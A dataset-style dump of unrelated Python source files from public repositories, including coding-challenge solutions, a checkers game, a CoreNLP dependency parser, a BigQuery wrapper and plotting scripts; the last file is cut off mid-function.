blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
2a98a61dd1808917200ad09786b37963648a1b2a | Python | zakaria967/hackerrank-solutions | /Standardize mobile number using Decorators/standardizemobilenumber.py | UTF-8 | 534 | 2.671875 | 3 | [] | no_license | from __future__ import print_function
# Read the count of phone numbers, then that many raw lines of input
# (Python 2: raw_input / xrange; input() evaluates the first line as an int).
a=[raw_input() for i in xrange(input())]
def standardize(phone):
    """Format an Indian phone number as '+91 XXXXX XXXXX'.

    Accepted inputs: a leading-0 local form, a '91'-prefixed form,
    a bare 10-digit number, or an already '+91'-prefixed string
    (the last case is re-spaced positionally, as is any other input
    that matches none of the recognised prefixes).
    """
    if phone.startswith("0"):
        # drop the trunk prefix '0'
        digits = phone[1:]
    elif phone.startswith("91"):
        # a 10-digit number that merely *starts* with 91 is kept whole;
        # a longer one has the country code stripped
        digits = phone if len(phone) == 10 else phone[2:]
    elif len(phone) == 10:
        digits = phone
    else:
        # e.g. '+91XXXXXXXXXX': keep the first 3 chars as the prefix
        return phone[:3] + " " + phone[3:8] + " " + phone[8:]
    return "+91 " + digits[:5] + " " + digits[5:]
# Sort the standardized numbers and print one per line.
# (Python 2: map() is eager, so print runs immediately; under Python 3 this
# would produce a lazy map object and print nothing.)
map(print, sorted(map(standardize, a)))
| true |
9a3051711511e39bd2ae40356af9a50b42b0f06b | Python | sulicat/tableTopSystem | /src/alexCode.py | UTF-8 | 13,460 | 3.078125 | 3 | [] | no_license | import sys
sys.path.append("../../")
import Graphics
import pygame
import numpy as np
import misc
class Checkers(Graphics.Game):
    """Checkers driven by a physically scanned board.

    ``render`` is called every frame with the scanned board as an 8x8 array
    whose cells hold 0 (empty), ``self.white`` or ``self.black``.  A lifted
    piece is detected by diffing the scan against the last fully populated
    snapshot; its legal destinations are highlighted until it is put down.
    """

    def __init__(self, name):
        super().__init__(name)
        self.care = 0                # 1 while the last snapshot is a trustworthy reference
        self.current_state = []      # last board scan with every piece present
        self.white = 12              # cell value identifying white pieces
        self.black = 24              # cell value identifying black pieces
        self.total_pieces = 24
        self.turn = 0                # advanced by 0.5 per pick-up / put-down pair
        # highlighted squares for the two forward directions (x/y) ...
        self.xmoves, self.xfinal_moves, self.ymoves, self.yfinal_moves = [], [], [], []
        # ... and the two backward, king-only directions (w/z)
        self.wmoves, self.wfinal_moves, self.zmoves, self.zfinal_moves = [], [], [], []
        # picked_up == 0 means anticipating piece being picked up
        # picked_up == 1 means anticipating piece being placed down
        self.picked_up = 0
        self.kings = []              # [row, col] positions of crowned pieces

    def start(self):
        print("start Checkers")

    def adjacent(self, a):
        """Return 1 when position a = (row, col) lies on the 8x8 board, else 0."""
        if (0 <= a[0] <= 7) and (0 <= a[1] <= 7):
            return 1
        return 0

    def _explore(self, current_state, value, candidate, origin, moves, final_moves):
        """Recurse into *candidate* (reached by a jump from *origin*) and
        accumulate its reachable squares into moves / final_moves."""
        status, new_moves, new_final_moves = self.move(current_state, value, candidate, [origin])
        if status == 2:
            # further jumps possible: pass-through squares
            for m in new_moves:
                moves.append(m)
        else:
            # terminal squares: the piece must stop here
            for f in new_final_moves:
                final_moves.append(f)

    def move(self, current_state, value, move, location):
        """Classify the square *move* for the piece of colour *value* at
        *location* and return (status, moves, final_moves).

        status 0: empty square (plain step), 1: blocked by a friendly piece,
        2: enemy piece that may be jumped; moves / final_moves are lists of
        [row, col] squares (pass-through vs. terminal).
        """
        square = [move[0], move[1]]
        if current_state[move[0], move[1]] == value:
            # own piece occupies the adjacent square: blocked
            return 1, [square], [square]
        elif current_state[move[0], move[1]] == 0:
            # empty square: a plain single-step move
            return 0, [square], [square]
        else:
            # enemy piece: the landing square is its mirror across the enemy
            move[0] = ((move[0] - location[0][0]) * 2) + location[0][0]
            move[1] = ((move[1] - location[0][1]) * 2) + location[0][1]
            moves, final_moves = [], []
            # Bounds check added: the original indexed the landing square
            # unguarded, wrapping on negatives and raising past row/col 7.
            if self.adjacent(move) == 1 and current_state[move[0]][move[1]] == 0:
                offs = 1 if value == self.white else -1
                # Probe all four continuations around the landing square.
                # (BUG FIX: the original re-used move2 for the last two probes.)
                for candidate in (np.asarray([move[0] + offs, move[1] - 1]),
                                  np.asarray([move[0] + offs, move[1] + 1]),
                                  np.asarray([move[0] - offs, move[1] - 1]),
                                  np.asarray([move[0] - offs, move[1] + 1])):
                    if self.adjacent(candidate) == 1:
                        self._explore(current_state, value, candidate, move, moves, final_moves)
                moves.append([move[0], move[1]])
            return 2, moves, final_moves

    def render(self, screen, board):
        """Draw the board and run the pick-up / put-down state machine
        against the freshly scanned *board*."""
        screen.fill((0, 0, 0))
        misc.render_grid(screen)
        # cell width and height in pixels
        cw, ch = (screen.get_width()) / 8, (screen.get_height()) / 8
        # back-rank squares on which a piece gets crowned
        white_king = [[7, 0], [7, 2], [7, 4], [7, 6]]
        black_king = [[0, 1], [0, 3], [0, 5], [0, 7]]
        # checkerboard background
        for r in range(8):
            for c in range(8):
                if (r % 2) == (c % 2):
                    pygame.draw.rect(screen, (255, 105, 180), (r * cw, c * ch, cw, ch))
        if np.count_nonzero(board) == self.total_pieces:
            # every piece visible: trust the scan as the new reference state
            self.care = 1
            self.current_state = board
        elif np.count_nonzero(board) <= self.total_pieces - 2 or np.count_nonzero(board) >= self.total_pieces + 2:
            # two or more pieces missing/extra: treat the scan as noise
            self.care = 0
        else:
            if self.care == 1:
                # squares where the scan differs from the reference snapshot
                location = np.asarray(np.where((self.current_state == board) == False)).T.tolist()
                if len(location) > 0:
                    single_value = self.current_state[location[0][0]][location[0][1]]
                    # highlight the affected square in gold
                    pygame.draw.rect(screen, (255, 215, 0), ((7 - location[0][1]) * cw, location[0][0] * ch, cw, ch))
                    if self.turn % 2 == 0 and single_value == self.white:
                        pass
                    elif self.turn % 2 == 1 and single_value == self.black:
                        pass
                    else:
                        print("Not your turn!")
                        return
                    # forward move candidates for this colour
                    if single_value == self.white:
                        offs = 1
                    else:
                        offs = -1
                    move1 = [location[0][0] + offs, location[0][1] - 1]
                    move2 = [location[0][0] + offs, location[0][1] + 1]
                    move1, move2 = np.asarray(move1), np.asarray(move2)
                    m1, m2 = self.adjacent(move1), self.adjacent(move2)
                    # the next few candidates only apply to kings (backward moves)
                    move3 = [location[0][0] - offs, location[0][1] - 1]
                    move4 = [location[0][0] - offs, location[0][1] + 1]
                    move3, move4 = np.asarray(move3), np.asarray(move4)
                    m3, m4 = self.adjacent(move3), self.adjacent(move4)
                    if self.picked_up == 0:
                        # a piece was just lifted: draw its movement options
                        if m1 == 1:
                            x, self.xmoves, self.xfinal_moves = \
                                self.move(self.current_state, single_value, move1, location)
                            if x == 0:
                                pygame.draw.rect(screen, (50, 120, 0),
                                                 ((7 - self.xfinal_moves[0][1]) * cw, self.xfinal_moves[0][0] * ch, cw, ch))
                            elif x == 1:
                                # BUG FIX: the original read `selx.ffinal_moves` here
                                pygame.draw.rect(screen, (255, 0, 0),
                                                 ((7 - self.xfinal_moves[0][1]) * cw, self.xfinal_moves[0][0] * ch, cw, ch))
                            else:
                                # adjacent cell is an enemy unit and the piece may jump
                                for mov in self.xmoves:
                                    pygame.draw.rect(screen, (50, 120, 0), ((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
                                for fmov in self.xfinal_moves:
                                    pygame.draw.rect(screen, (0, 180, 0), ((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
                        if m2 == 1:
                            y, self.ymoves, self.yfinal_moves = self.move(self.current_state, single_value, move2, location)
                            if y == 0:
                                pygame.draw.rect(screen, (50, 120, 0),
                                                 ((7 - self.yfinal_moves[0][1]) * cw, self.yfinal_moves[0][0] * ch, cw, ch))
                            elif y == 1:
                                pygame.draw.rect(screen, (255, 0, 0),
                                                 ((7 - self.yfinal_moves[0][1]) * cw, self.yfinal_moves[0][0] * ch, cw, ch))
                            else:
                                for mov in self.ymoves:
                                    pygame.draw.rect(screen, (50, 120, 0), ((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
                                for fmov in self.yfinal_moves:
                                    pygame.draw.rect(screen, (0, 255, 0), ((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
                        if location[0] in self.kings:
                            # kings may also move backwards (directions 3 and 4)
                            if m3 == 1:
                                w, self.wmoves, self.wfinal_moves = self.move(self.current_state, single_value,
                                                                              move3, location)
                                if w == 0:
                                    pygame.draw.rect(screen, (50, 120, 0),
                                                     ((7 - self.wfinal_moves[0][1]) * cw, self.wfinal_moves[0][0] * ch, cw, ch))
                                elif w == 1:
                                    pygame.draw.rect(screen, (255, 0, 0),
                                                     ((7 - self.wfinal_moves[0][1]) * cw, self.wfinal_moves[0][0] * ch, cw, ch))
                                else:
                                    for mov in self.wmoves:
                                        pygame.draw.rect(screen, (50, 120, 0),
                                                         ((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
                                    for fmov in self.wfinal_moves:
                                        pygame.draw.rect(screen, (0, 255, 0),
                                                         ((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
                            if m4 == 1:
                                z, self.zmoves, self.zfinal_moves = self.move(self.current_state, single_value,
                                                                              move4, location)
                                if z == 0:
                                    pygame.draw.rect(screen, (50, 120, 0),
                                                     ((7 - self.zfinal_moves[0][1]) * cw, self.zfinal_moves[0][0] * ch, cw, ch))
                                elif z == 1:
                                    pygame.draw.rect(screen, (255, 0, 0),
                                                     ((7 - self.zfinal_moves[0][1]) * cw, self.zfinal_moves[0][0] * ch, cw, ch))
                                else:
                                    for mov in self.zmoves:
                                        pygame.draw.rect(screen, (50, 120, 0),
                                                         ((7 - mov[1]) * cw, mov[0] * ch, cw, ch))
                                    for fmov in self.zfinal_moves:
                                        pygame.draw.rect(screen, (0, 255, 0),
                                                         ((7 - fmov[1]) * cw, fmov[0] * ch, cw, ch))
                        self.picked_up = self.picked_up + 1
                    else:
                        # the piece is being placed back down.
                        # Drop pass-through squares that are also terminal squares.
                        # (BUG FIX: the original `del[i]` deleted the loop variable
                        # and raised NameError on the next comparison.)
                        self.xmoves = [m for m in self.xmoves if m not in self.xfinal_moves]
                        self.ymoves = [m for m in self.ymoves if m not in self.yfinal_moves]
                        # Check that the drop square is a legal destination.
                        # (BUG FIX: the original tested membership in the `or` of the
                        # lists, which only ever consulted the first non-empty list.)
                        if location[0] in self.kings:
                            legal = (location[0] in self.xfinal_moves or location[0] in self.yfinal_moves or
                                     location[0] in self.wfinal_moves or location[0] in self.zfinal_moves)
                        else:
                            legal = location[0] in self.xfinal_moves or location[0] in self.yfinal_moves
                        if legal:
                            # pieces captured by the move == drop in the scanned count
                            # NOTE(review): the original referenced an undefined name
                            # `remove` here; confirm this diff-based count is intended.
                            removed = self.total_pieces - np.count_nonzero(board)
                            self.total_pieces = self.total_pieces - removed
                        else:
                            print("Not a valid move!")
                            return
                        # crown pieces that reached the opposite back rank
                        # (BUG FIX: the original compared against the whole
                        # white_king / black_king lists instead of one square)
                        for w in white_king:
                            if location[0] == w and single_value == self.white:
                                self.kings.append(location[0])
                        for b in black_king:
                            if location[0] == b and single_value == self.black:
                                self.kings.append(location[0])
                        self.picked_up = self.picked_up - 1
                        self.turn = self.turn + 0.5

    def end(self):
        print("end test")
def end(self):
print("end test")
| true |
2ed09a8fbde558a317e6a3795eab4a013f6e14b5 | Python | tmu-nlp/100knock2016 | /ryosuke/chapter06/knock58.py | UTF-8 | 2,873 | 2.703125 | 3 | [] | no_license | from collections import defaultdict
import xml.sax as sax
class SVOSlot:
    """Mutable holder for one (subject, verb, object) triple.

    Each field starts as None and is filled independently; `is_filled`
    reports whether the whole triple has been collected.
    """

    def __init__(self):
        self.s = None
        self.v = None
        self.o = None

    def is_filled(self):
        """True once subject, verb and object have all been set."""
        return all(part is not None for part in (self.s, self.v, self.o))

    def fill_s(self, s):
        """Set the subject."""
        self.s = s

    def fill_v(self, v):
        """Set the verb."""
        self.v = v

    def fill_o(self, o):
        """Set the object."""
        self.o = o

    def get_svo(self):
        """Return the triple as a (s, v, o) tuple."""
        return self.s, self.v, self.o
class StanfordCoreXMLHandler(sax.handler.ContentHandler):
    """SAX handler extracting (subject, verb, object) triples from Stanford
    CoreNLP XML output.

    Only "collapsed-dependencies" sections are consulted: an ``nsubj``
    dependency supplies the verb (governor) and subject (dependent); a
    ``dobj`` dependency on the same governor supplies the object.  Each
    completed triple is printed tab-separated once per governor id.
    """

    def __init__(self):
        self.tags = list()                    # stack of currently open element names
        self.in_dependencies = False          # inside a collapsed-dependencies block?
        self.vid2svo = defaultdict(SVOSlot)   # "<sentence>_<idx>" -> partial triple
        self.already = set()                  # governor ids already printed

    def startElement(self, name, attrs):
        self.push_tag(name)
        if name == 'sentence' and 'id' in attrs:
            self.sent_id = attrs['id']
        if name == 'dependencies' and \
                'type' in attrs and attrs['type'] == 'collapsed-dependencies':
            self.in_dependencies = True
        if self.in_dependencies and name == 'dep' and 'type' in attrs:
            self.type = attrs['type']
        if self.in_dependencies and name == 'governor':
            # governor id is qualified by the sentence so it is globally unique
            self.gov_id = '{}_{}'.format(self.sent_id, attrs['idx'])

    def characters(self, content):
        if self.in_dependencies:
            if self.current_tag() == 'governor':
                if self.gov_id in self.already:
                    pass
                else:
                    svo = self.vid2svo[self.gov_id]
                    if self.type == 'nsubj':
                        # governor of an nsubj relation is the verb
                        svo.fill_v(content)
            if self.current_tag() == 'dependent':
                if self.gov_id in self.already:
                    pass
                else:
                    svo = self.vid2svo[self.gov_id]
                    if self.type == 'nsubj':
                        # dependent of an nsubj relation is the subject
                        svo.fill_s(content)
                        if svo.is_filled():
                            print('{}\t{}\t{}'.format(*svo.get_svo()))
                            self.vid2svo[self.gov_id] = None
                            self.already.add(self.gov_id)
                    elif self.type == 'dobj':
                        # dependent of a dobj relation is the object
                        svo.fill_o(content)
                        if svo.is_filled():
                            print('{}\t{}\t{}'.format(*svo.get_svo()))
                            self.vid2svo[self.gov_id] = None
                            self.already.add(self.gov_id)

    def endElement(self, name):
        self.pop_tag()
        if name == 'dependencies':
            # BUG FIX: the original reset a never-read `is_representative`
            # flag here, leaving `in_dependencies` True forever, so later
            # non-collapsed dependency sections were processed as well.
            self.in_dependencies = False

    def current_tag(self):
        """Name of the innermost open element."""
        return self.tags[-1]

    def push_tag(self, tag):
        self.tags.append(tag)

    def pop_tag(self):
        return self.tags.pop(-1)
# Wire the handler into a SAX parser and stream-parse the CoreNLP output file.
parser = sax.make_parser()
handler = StanfordCoreXMLHandler()
parser.setContentHandler(handler)
parser.parse(open('nlp.xml'))
| true |
cc989fc6030243b79d611dad353153987cf1fd9e | Python | ljxproject/comics | /api/helpers/decorator.py | UTF-8 | 741 | 2.578125 | 3 | [] | no_license | from api.helpers import hump_to_attr
def set_attr(func):
    """Decorator for (instance, request) handlers.

    Before calling *func*, copies every truthy field of ``request.data``
    onto *instance* (attribute names converted via hump_to_attr; the
    "email" value is lower-cased), then normalises the language: missing
    lang defaults to "ms" and "en" is coerced to "ms".
    """
    def inner(instance, request):
        for key, value in request.data.items():
            if not value:
                # skip empty / falsy fields entirely
                continue
            attr = hump_to_attr(key)
            setattr(instance, attr, value.lower() if key == "email" else value)
        if not hasattr(instance, "lang"):
            setattr(instance, "lang", "ms")
        elif getattr(instance, "lang") == "en":
            setattr(instance, "lang", "ms")
        return func(instance, request)
    return inner
| true |
20c374cd15558a5c96ba186778de4821a949a681 | Python | sunshy2008/autotestwork | /workspace/finalscripts/PyUnitTest/testclass.py | UTF-8 | 236 | 2.625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
class testnum():
    """Tiny arithmetic fixture used by the unit-testing exercises."""

    def sumnum(self, a, b):
        """Return the sum of a and b."""
        return a + b

    def delnum(self, a, b):
        """Return a minus b."""
        return a - b

    def hello(self):
        """Return the canonical greeting string."""
        return "hello world"

    def chengfa(self, a, b):
        """Return the product of a and b ('chengfa' = multiplication)."""
        return a * b
2d3c74e8d813080b1a133df1bbb53049855fcd7c | Python | harshitanand/Hackerrank-Solutions | /Algorithms/Warmup/DiagonalDifference.py | UTF-8 | 232 | 2.875 | 3 | [] | no_license | #!/bin/python
import sys
if __name__ == "__main__":
    # Python 2 script (raw_input / xrange / print statement).
    # Reads n, then an n x n integer matrix, and prints the absolute
    # difference between the primary- and secondary-diagonal sums.
    n = int(raw_input().strip())
    res = 0
    for i in xrange(n):
        arr = map(int,raw_input().strip().split(' '))
        # primary-diagonal element minus the mirrored secondary-diagonal one
        res += arr[i]-arr[-(i+1)]
    print abs(res)
| true |
96db95bd7566d535c909bf997a3b704cd75fdea5 | Python | GabrielEstevam/icpc_contest_training | /uri/uri_python/ad_hoc/p1032.py | UTF-8 | 506 | 2.84375 | 3 | [] | no_license | N = 32700
# Sieve of Eratosthenes over [0, N) -- N (= 32700) is defined above.
# After the sieve, num[i] == 1 iff i survived; note that 1 is never
# crossed out, so `primes` below actually starts 1, 2, 3, 5, 7, ...
num = []
for i in range(N):
    num.append(1)
i = 2
while True:
    # cross out every multiple of i, starting at 2*i
    k = i * 2
    while k < N:
        num[k] = 0
        k += i
    # advance i to the next surviving candidate
    i += 1
    while i < N:
        if num[i]:
            break
        i += 1
    if i == N:
        break
primes = []
for i in range(1, N):
    if num[i]:
        primes.append(i)
# Josephus-style elimination (URI 1032 "Joseph's Cousin"):
# in round i the step size is primes[i + 1]; survivors are eliminated
# one per round until a single position remains.  Input is a sequence
# of board sizes terminated by 0.
N = int(input())
while N != 0:
    flag = []
    for i in range(1, N+1):
        flag.append(i)
    j = 0
    for i in range(N-1):
        k = primes[i + 1]
        # move k-1 places forward, wrapping around the shrinking circle
        j += (k - 1)
        #if j >= N-i:
        j = j % (N-i)
        flag.remove(flag[j])
    print(flag[0])
    N = int(input())
| true |
50121b1712108040fc973cb8eedaf78fed1a61c6 | Python | PClark344/Demos-Learning | /Comprehensions.py | UTF-8 | 1,104 | 4.28125 | 4 | [] | no_license | # python comprehensions
# numbers
num = range(10)
# squares of the even numbers in 0..9
print([x*x for x in num if x % 2 ==0])
print(chr(10))  # chr(10) is '\n' -- prints an extra blank line
# multiples of 27 below 300
print([i for i in range(300) if i % 27 == 0])
print(chr(10))
msg = 'Hello 242 World'
# pick out the digit characters of msg as ints
nums = [int(x) for x in msg if x.isdigit()]
print('numbers in ',msg,' are: ',nums)
print(chr(10))
# two chained `if` clauses act as an AND: divisible by both 2 and 5
num_list = [number for number in range(51) if number % 2 ==0 if number % 5 == 0]
print('num_list = ',num_list)
print(chr(10))
nums = [12,66,33,22,95,87,64,19]
# conditional expression in the output position, filters on the right
res = ['small' if num < 20 else 'large' for num in nums if num %2 == 0 if num %3 == 0]
print('Result = ',res)
# strings
print([letter for letter in 'anxiety'])
print(chr(10))
# (fixed comment -- the original was missing a closing bracket)
# print([i for i in "Mathematics" if i in ["A","E","I","O","U"]])
# lists
list_of_weeks = ['this','is','a','list','of','weeks','honest']
# first letter of each word
print([word[0] for word in list_of_weeks])
print(chr(10))
print([word.upper() for word in list_of_weeks])
print(chr(10))
print([word[0].upper() for word in list_of_weeks])
print(chr(10))
# nested loops
stationery = ['Pen','Rubber','Ink']
colours = ['Red','Blue','Green']
# cartesian product: the rightmost `for` is the outer loop
combined = [(i,j) for j in stationery for i in colours]
print(combined)
| true |
b767d7fabe9cc42724fa383a202bc11bae039786 | Python | rrwielema/ezgoogleapi | /ezgoogleapi/bigquery/base.py | UTF-8 | 6,058 | 2.9375 | 3 | [
"MIT"
] | permissive | import math
import warnings
from typing import Union
import pandas as pd
from google.cloud import bigquery
import os
from ezgoogleapi.common.validation import check_keyfile
BASE_DIR = os.getcwd()
class BigQuery:
    """Convenience wrapper around a google.cloud.bigquery client bound to a
    single table, selected via :meth:`set_table`."""

    def __init__(self, keyfile: str):
        """Authenticate with the service-account *keyfile* (absolute path, or
        resolved relative to the working directory)."""
        if not os.path.isabs(keyfile):
            keyfile = BASE_DIR + '\\' + keyfile
        self.keyfile = check_keyfile(keyfile)
        os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = keyfile
        self.client = bigquery.Client()
        self.table = None        # fully qualified "Project.Dataset.TableName"
        self.table_name = None   # bare table name (last component)

    def set_table(self, table):
        """Select the table all subsequent operations act on.

        Raises:
            ValueError: if *table* is not 'Project.Dataset.TableName'.
        """
        if not check_table_format(table):
            raise ValueError(f'{table} is not a valid BigQuery table name. It should follow the format '
                             f'Project.Dataset.TableName.')
        else:
            self.table = table
            self.table_name = table.split('.')[2]

    def create_table(self, schema: list):
        """Create the configured table.

        Each *schema* entry is either a bare field name (typed STRING) or a
        [name, type] pair.
        """
        sch = []
        for field in schema:
            if type(field) == list:
                sch.append(bigquery.SchemaField(field[0], field[1]))
            else:
                sch.append(bigquery.SchemaField(field, "STRING"))
        new_table = bigquery.Table(self.table, schema=sch)
        self.client.create_table(new_table)
        print(f'Created table {self.table_name}')

    def delete_table(self, sure: bool = False):
        """Irreversibly drop the configured table; requires sure=True."""
        check_table(self.table)
        if not sure:
            raise UserWarning(
                f'If you are sure you want to delete {self.table_name}, pass the sure=True option for the '
                f'delete_table() function. There is no way to recover the table once it has been deleted.')
        else:
            self.client.delete_table(self.table, not_found_ok=True)
            print(f'Table {self.table} was deleted')

    def delete_rows(self, condition: str = None, sure: bool = False):
        """Delete rows matching *condition* (a SQL WHERE clause without the
        keyword); deleting every row requires sure=True."""
        check_table(self.table)
        if not condition and not sure:
            raise UserWarning(f'Running delete_records() without a condition deletes every row in '
                              f'table {self.table_name}. If you are sure you want this, pass the sure=True parameter. '
                              f'Otherwise, provide a condition.')
        query = f'DELETE FROM {self.table}'
        if condition:
            query += ' WHERE ' + condition
        query_job = self.client.query(query)
        # NOTE(review): client.query() returns a (truthy) QueryJob, so this
        # message is effectively never printed -- confirm whether
        # query_job.result() should be awaited and checked instead.
        if not query_job:
            print('Rows deleted')

    def insert_rows(self, data: Union[list, dict, pd.DataFrame], per_request: int = 10000):
        """Insert *data* into the configured table in batches.

        *data* may be a DataFrame, a list of homogeneous dicts, or a list of
        lists whose first entry is the header row.  *per_request* rows are
        sent per API call (clamped to BigQuery's 10000-row limit).
        """
        if per_request > 10000 or per_request < 0 or type(per_request) != int:
            warnings.warn('Invalid entry. The per_request parameter is between 0 and 10000. Value will be set to 10000',
                          UserWarning)
            per_request = 10000
        check_table(self.table)
        # normalise all accepted input shapes to a DataFrame
        if type(data) != pd.DataFrame:
            if type(data[0]) == dict:
                df = pd.DataFrame(data)
            elif type(data[0]) == list:
                columns = data[0]
                values = data[1:]
                df = pd.DataFrame(columns=columns, data=values)
            else:
                raise TypeError(
                    'Data is not specified in the correct format. It needs to be either:\n\n'
                    ' - a pandas DataFrame\n'
                    ' - a list containing dictionaries with the same keys in each dictionary\n'
                    ' - a list containing lists where the first list represents the headers and the following contain '
                    'the data '
                )
        else:
            df = data
        to_write = df.to_dict('records')
        for x in range(0, math.ceil(len(to_write) / per_request)):
            # the last batch takes whatever rows remain
            if x == math.ceil(len(to_write) / per_request) - 1:
                insert = to_write[0 + (x * per_request):]
            else:
                insert = to_write[0 + (x * per_request): per_request + (x * per_request)]
            errors = self.client.insert_rows_json(self.table, insert)
            if not errors:
                print(f"{len(insert)} rows added to table {self.table_name}")
            else:
                print(f"Error: {errors}")

    def read_table(self, columns: Union[list, str] = None, condition=None, return_format='df'):
        """Read rows from the configured table.

        Args:
            columns: column name(s) to select; None selects everything.
            condition: optional SQL WHERE clause (without the keyword).
            return_format: 'df' (DataFrame, default), 'dict' (list of dicts)
                or 'list' (row values only, headers lost).
        """
        check_table(self.table)
        if columns:
            if type(columns) == list:
                query = f'SELECT {", ".join(columns)} FROM {self.table}'
            elif type(columns) == str:
                query = f'SELECT {columns} FROM {self.table}'
            else:
                raise ValueError(f'Incorrect data type \'{type(columns)}\' for parameter \'columns\'. Supply either '
                                 f'\'str\' or \'list\'')
        else:
            query = f'SELECT * FROM {self.table}'
        if condition:
            query += ' WHERE ' + condition
        query_job = self.client.query(query)
        result = query_job.result()
        result_rows = []
        for row in result:
            row_values = dict(zip(list(row.keys()), list(row.values())))
            result_rows.append(row_values)
        if return_format == 'list':
            return [f.values() for f in result_rows]
        elif return_format == 'dict':
            return result_rows
        elif return_format == 'df':
            return pd.DataFrame(result_rows)
        else:
            warnings.warn(
                f"Format {return_format} is not valid. There will be data returned in the form of a pd.DataFrame.\n"
                f"The valid formats are:\n\n"
                f"'df' - Returns pandas DataFrame (default).\n"
                f"'dict' - Returns list of dictionaries.\n"
                f"'list' - Returns list of lists containing the rows. Headers will be lost."
            )
            # BUG FIX: the original fell through and returned None despite
            # the warning promising a DataFrame.
            return pd.DataFrame(result_rows)
def check_table_format(table):
    """True iff *table* has exactly three dot-separated components,
    i.e. looks like 'Project.Dataset.TableName'."""
    return table.count('.') == 2
def check_table(table):
    """Raise UserWarning when no table has been configured yet."""
    if table:
        return
    raise UserWarning(
        'No table was specified via the BigQuery.set_table("Project.database.table") method.'
    )
| true |
cb2859ec355367a4ce8920baeec509495b7b9fb1 | Python | dleebrown/misc_plots | /single_solar_gen.py | UTF-8 | 676 | 2.875 | 3 | [] | no_license | # make a nice plot of solar spectrum and saves with no background
import numpy as np
import matplotlib.pyplot as plt
# Load the two-column spectrum file: column 0 = wavelength, column 1 = flux.
solardata = np.genfromtxt('../misc_data/objs_ap5.txt')
# keep only the slice of rows that covers the plotted window
solar_wave = solardata[500:1541, 0]
solar_flux = solardata[500:1541, 1]
# empirical calibration offsets applied to wavelength and flux
solar_wave = solar_wave + 0.42
solar_flux = solar_flux - 0.009
fig=plt.figure(figsize=(35,4.5))
plt.plot(solar_wave, solar_flux, linewidth=3.0, color='Black', label='Sun, T=5770')
plt.xticks(np.arange(6600, 6800.5, 3))
plt.yticks(np.arange(.70, 1.05, 0.05))
# zoom to the 6690-6730 Angstrom window
plt.xlim((6690, 6730))
plt.ylim((0.67, 1.03))
plt.tick_params(labelsize=14)
# transparent=True drops the background so the figure can be overlaid
plt.savefig('justthesun', format='png', transparent=True, bbox_inches='tight')
plt.show()
9a33870148dcdd260a35d69b3d279b07edddc2c2 | Python | xiaochaotest/Local-submission | /automation_testing_day01/show_testing/python_basics/set_Test.py | UTF-8 | 1,440 | 4.09375 | 4 | [] | no_license | #!/usr/bin/env python
#-*- coding:utf-8 -*-
# author: Peng Chao
'''
set demo (Python 2)

A set is an unordered collection with no duplicate elements; the keyword
is `set`.  As with dicts, lists and tuples, we rarely remember every
method a type offers, but we can always inspect it at run time with
dir() and help() -- which is exactly what this walkthrough leans on.
'''
s = set()
# print the set type's methods:           dir(s)
# print the set type's full documentation: help(type(s))
# insert an element into the set
s.add('xiaochao')
print u'插入数据后集合的内容:',s,type(s)
# convert a list to a set
list1 = [11,21,51,45,36,4]
print u'列表list1转换为集合后:',set(list1),type(set(list1))
# elements present in b but absent from a
b = {1,2,25,36,6}
a = {5,87,9,1,88}
print u'查看b集合存在,a集合不存在的内容:',b.difference(a)
# discard() removes without raising if the element is missing
# (NOTE: discard returns None, so this line prints None)
print u'移除指定的集合,不存在不会出现错误:',b.discard('xiaochao')
print u'查看集合a,b都存在的值:',a.intersection(b)
# isdisjoint: True when there is no intersection, False otherwise
print u'判断集合a,b是否存在交集:',a.isdisjoint(b)
print u'移除集合的元素并且获取值:',a.pop()
print u'获取a,b集合的并集:',a.union(b)
b.update(a)
print u'集合b更新后的内容为:',b
| true |
c8cd4854722b4ae034f4805189991497916c04c3 | Python | Janik-B/BA | /visualization/convergence_plot_utils.py | UTF-8 | 1,671 | 3.15625 | 3 | [] | no_license | import matplotlib.pyplot as plt
from algorithms.gradient_descent import *
def plot_iterates_on_function(ax, function, x_val, x_min, x_max, title):
    """Plot *function* over [x_min, x_max] on axis *ax* and overlay the
    iterates *x_val*, colour-coding each point by its iteration index."""
    y_val = [function(x) for x in x_val]
    # iteration index of each iterate, used as the scatter colour value
    z_val = np.arange(len(x_val))
    xs = np.linspace(x_min, x_max, 100)
    ys = [function(x) for x in xs]
    ax.plot(xs, ys)
    ax.plot(x_val, y_val)
    cm = plt.cm.get_cmap('RdYlBu')
    ax.scatter(x_val, y_val, c=z_val, vmin=0, vmax=len(x_val), cmap=cm)
    ax.set_title(title)
def plot_iterates_on_level_sets(ax, function, x_val, x_min, x_max, y_min, y_max, title):
    """Draw level sets of the 2-D *function* on *ax* and overlay the iterate
    path *x_val* -- assumed shape (n, 2); TODO confirm -- as starred points
    connected by arrows."""
    x = np.linspace(x_min, x_max, 250)
    y = np.linspace(y_min, y_max, 250)
    X, Y = np.meshgrid(x, y)
    Z = function([X, Y])
    number_of_level_sets = 10
    ax.contour(X, Y, Z, number_of_level_sets, cmap='jet')
    # displacement vectors between consecutive iterates (arrow directions)
    angles_x = x_val[1:, 0] - x_val[:-1, 0]
    angles_y = x_val[1:, 1] - x_val[:-1, 1]
    ax.scatter(x_val[:, 0], x_val[:, 1], color='r', marker='*', s=1)
    ax.quiver(x_val[:-1, 0], x_val[:-1, 1], angles_x, angles_y, scale_units='xy', angles='xy', scale=1, color='r',
              alpha=.3)
    # label text is German: "Iterationen" = iterations
    ax.set_xlabel("{} Iterationen".format(len(x_val[1:])))
    ax.set_title(title)
def plot_error_convergence(ax, x_vals, learning_rates, function, minimum, title, param_name):
    """Plot |f(x_k) - f(x*)| per iteration on a log scale for several runs.

    x_vals[i] holds the iterates of run i; learning_rates[i] is the
    parameter value shown in that run's legend entry (prefixed by
    *param_name*); *minimum* is the known minimiser x*."""
    f_min = function(minimum)
